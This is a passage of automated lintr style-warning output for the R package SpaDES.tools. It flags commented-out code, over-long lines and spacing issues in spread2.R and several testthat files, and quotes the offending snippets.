^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:759:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L759) *style:* **Commented code should be removed.**\n```r\n​          # colnamesDtPot <- colnames(dtPotential)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:760:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L760) *style:* **Commented code should be removed.**\n```r\n​          # ll <-  lapply(colnamesDtPot, function(x) dtPotential[[x]][!spreadProbNA])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:761:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L761) *style:* **Commented code should be removed.**\n```r\n​          # names(ll) <- colnamesDtPot\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:762:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L762) *style:* **Commented code should be removed.**\n```r\n​          # dtPotential <- as.data.table(ll)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:772:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L772) *style:* **Lines should not be more than 100 characters.**\n```r\n​                                                                   .I[sample.int(length(numNeighs), size = numNeighs, prob = spreadProbRel)],\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:787:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L787) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      NAaSP <- !is.na(actualSpreadProb)\n      ^~~~~\n```\n[R/spread2.R:789:42:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L789) *style:* **Commas should always have a space after.**\n```r\n​        dtPotential <- dtPotential[NAaSP,]\n                                         ^\n```\n[R/spread2.R:830:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L830) *style:* **Lines should not be more than 100 characters.**\n```r\n​        # this is to prevent overlap within an event... in some cases, overlap within event is desired, so skip this block\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L848) *style:* **Lines should not be more than 100 characters.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/spread2.R:848:10:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/R/spread2.R#L848) *style:* **Commented code should be removed.**\n```r\n​        #successCells <- na.omit(successCells[!dupsWithinDtPotential]) # remove the dupsWithinDtPotential\n         ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:6:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-examples.R#L6) *style:* **Commented code should be removed.**\n```r\n​    cat(\"#START##############\\n\", file = tmpExFile, append = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-examples.R:17:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-examples.R#L17) *style:* **Commas should never have a space before.**\n```r\n​  } , add = TRUE)\n   ~^\n```\n[tests/testthat/test-mapReduce.R:23:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L23) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:27:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L27) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:28:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L28) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:31:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L31) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:35:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L35) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:36:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L36) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:37:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L37) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:38:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L38) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:42:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L42) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:44:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L44) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:46:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L46) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(biomass))), sort(reducedDT$biomass))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:47:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L47) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(biomass))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:49:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L49) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:50:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L50) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:51:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L51) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:52:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L52) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:56:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L56) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:57:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L57) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:60:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L60) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:64:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L64) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0, 15, 0, 15), res = 1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:65:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L65) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes = 5, speedup = 1, p = 0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:67:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L67) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:71:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L71) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu = 4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:73:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L73) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:75:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L75) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:76:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L76) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:77:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L77) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(sort(unique(getValues(communities))), sort(reducedDT$communities))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:81:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L81) *style:* **Commented code should be removed.**\n```r\n​#   library(data.table)\n    ^~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:82:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L82) *style:* **Commented code should be removed.**\n```r\n​#   library(raster)\n    ^~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:85:6:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L85) *style:* **Commented code should be removed.**\n```r\n​#    detach(\"package:data.table\")\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:89:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L89) *style:* **Commented code should be removed.**\n```r\n​#   ras <- raster(extent(0,15,0,15), res=1)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:90:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L90) *style:* **Commented code should be removed.**\n```r\n​#   fullRas <- randomPolygons(ras, numTypes=5, speedup=1, p=0.3)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:91:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L91) *style:* **Commented code should be removed.**\n```r\n​#   names(fullRas) <- \"mapcodeAll\"\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:92:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L92) *style:* **Commented code should be removed.**\n```r\n​#   uniqueComms <- raster::unique(fullRas)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:96:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L96) *style:* **Commented code should be removed.**\n```r\n​#     biomass=rnbinom(length(uniqueComms), mu=4000, 0.4)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:98:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L98) *style:* **Commented code should be removed.**\n```r\n​#   biomass <- rasterizeReduced(reducedDT, fullRas, \"biomass\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:100:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L100) *style:* **Commented code should be removed.**\n```r\n​#   setkey(reducedDT, biomass)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:101:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L101) *style:* **Commented code should be removed.**\n```r\n​#   communities <- rasterizeReduced(reducedDT, fullRas, \"communities\")\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-mapReduce.R:102:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-mapReduce.R#L102) *style:* **Commented code should be removed.**\n```r\n​#   expect_equal(length(unique(getValues(communities))), length(unique(getValues(fullRas))))\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-randomPolygon.R:25:60:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-randomPolygon.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​  expect_true(base::abs(base::abs(polyArea - area)) <  area/4) ## TODO: why is this area/4?\n                                                          ~^~\n```\n[tests/testthat/test-splitRaster.R:148:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L148) *style:* **Commas should always have a space after.**\n```r\n​  expect_identical(dataType(y4[[1]]),\"INT1U\")\n                                     ^\n```\n[tests/testthat/test-splitRaster.R:165:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L165) *style:* **Lines should not be more than 100 characters.**\n```r\n​    tmpdir <- file.path(tempdir(), \"splitRaster-test-parallel\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:168:8:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L168) *style:* **Commented code should be removed.**\n```r\n​      #detach(\"package:raster\")\n       ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:226:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L226) *style:* **Lines should not be more than 100 characters.**\n```r\n​  tmpdir <- file.path(tempdir(), \"splitRaster-test-large\") %>% reproducible::checkPath(create = TRUE)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:264:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L264) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m)), min(values(r))) ## Error: cannot allocate vector of size 4.8 Gb\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:283:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L283) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(max(values(m1)), max(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-splitRaster.R:284:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-splitRaster.R#L284) *style:* **Commented code should be removed.**\n```r\n​  #expect_equal(min(values(m1)), min(values(r)))\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread.R:209:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread.R#L209) *style:* **Lines should not be more than 100 characters.**\n```r\n​    if (interactive()) Plot(circEdge, addTo = \"circs\", cols = c(\"transparent\", rainbow(numCircs)[whCirc]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:148:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L148) *style:* **Commented code should be removed.**\n```r\n​  #quickDT <- data.table(id = seq_along(sams), initialPixels = sams, key = \"id\")\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:150:4:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L150) *style:* **Commented code should be removed.**\n```r\n​  #cirOut <- quickDT[cirOut, on = ]\n   ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:473:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L473) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##                                    expr       min        lq      mean   median        uq       max neval\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:474:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L474) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##         iterativeFun(ras, FALSE, n, sp)  3.096979 12.642477  73.02248 35.17520  91.10528  764.4073   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:475:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L475) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##      nonIterativeFun(ras, FALSE, n, sp)  1.509484  6.555565  31.18444 14.91066  42.78317  158.5237   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:476:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L476) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ##           origSpread(ras, FALSE, n, sp)  5.154006  7.555631  14.87158 11.49005  17.50599  231.5487   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:477:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L477) *style:* **Lines should not be more than 100 characters.**\n```r\n​  ## origSpreadIterations(ras, FALSE, n, sp) 10.754669 51.524368 141.48620 93.61996 169.10808 2110.2683   300\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[tests/testthat/test-spread2.R:688:38:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L688) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  ciCentre[seq_len(ncell(ciCentre))[-(ncell(ciCentre) / 2 - ncol(ciCentre) / 2)]] <- NA_integer_\n                                     ^\n```\n[tests/testthat/test-spread2.R:884:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/c4b4923f5e7c2a92aa9d7c84c6e31bd3fc4f125e/tests/testthat/test-spread2.R#L884) *style:* **Lines should not be more than 100 characters.**\n```r\n​                       spreadProb = 0.23, persistProb = 0, iterations = 10, directions = 8L, plot.it = 